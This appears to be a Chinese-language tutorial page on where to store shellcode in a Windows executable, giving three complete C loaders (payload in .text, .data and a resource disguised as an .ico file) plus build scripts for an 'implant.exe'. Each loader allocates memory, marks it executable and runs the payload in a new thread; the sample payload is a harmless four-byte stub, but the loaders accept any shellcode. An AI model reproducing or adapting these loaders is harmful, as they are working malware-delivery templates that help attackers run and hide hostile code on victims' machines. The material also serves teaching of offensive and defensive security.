payload 存储在什么位置
- .text
- .data
- .rsrc
payload-store-text
#include <windows.h>#include <stdio.h>#include <stdlib.h>#include <string.h>int main(void) {void * exec_mem;BOOL rv;HANDLE th;DWORD oldprotect = 0;// 4 byte payloadunsigned char payload[] = {0x90, // NOP0x90, // NOP0xcc, // INT30xc3 // RET};unsigned int payload_len = 4;// Allocate a memory buffer for payloadexec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);// Copy payload to new bufferRtlMoveMemory(exec_mem, payload, payload_len);// Make new buffer as executablerv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);printf("\nHit me!\n");getchar();// If all good, run the payloadif ( rv != 0 ) {th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);WaitForSingleObject(th, -1);}return 0;}
@ECHO OFFcl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
payload-store-data
#include <windows.h>#include <stdio.h>#include <stdlib.h>#include <string.h>// 4 byte payloadunsigned char payload[] = {0x90, // NOP0x90, // NOP0xcc, // INT30xc3 // RET};unsigned int payload_len = 4;int main(void) {void * exec_mem;BOOL rv;HANDLE th;DWORD oldprotect = 0;// Allocate a memory buffer for payloadexec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);// Copy payload to new bufferRtlMoveMemory(exec_mem, payload, payload_len);// Make new buffer as executablerv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);printf("\nHit me!\n");getchar();// If all good, run the payloadif ( rv != 0 ) {th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);WaitForSingleObject(th, -1);}return 0;}
@ECHO OFFcl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
payload-store-rsrc
//1resources.h// #define FAVICON_ICO 100//2resources.rc//#include "resources.h"//FAVICON_ICO RCDATA calc.ico//3//calc.ico 放入payload shellcode#include <windows.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include "resources.h"int main(void) {void * exec_mem;BOOL rv;HANDLE th;DWORD oldprotect = 0;HGLOBAL resHandle = NULL;HRSRC res;unsigned char * payload;unsigned int payload_len;// Extract payload from resources sectionres = FindResource(NULL, MAKEINTRESOURCE(FAVICON_ICO), RT_RCDATA);resHandle = LoadResource(NULL, res);payload = (char *) LockResource(resHandle);payload_len = SizeofResource(NULL, res);// Allocate some memory buffer for payloadexec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);printf("%-20s : 0x%-016p\n", "payload addr", (void *)payload);printf("%-20s : 0x%-016p\n", "exec_mem addr", (void *)exec_mem);// Copy payload to new memory bufferRtlMoveMemory(exec_mem, payload, payload_len);// Make the buffer executablerv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);printf("\nHit me!\n");getchar();// Launch the payloadif ( rv != 0 ) {th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);WaitForSingleObject(th, -1);}return 0;}
@ECHO OFFrc resources.rccvtres /MACHINE:x64 /OUT:resources.o resources.rescl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
若有收获,就点个赞吧
0 人点赞
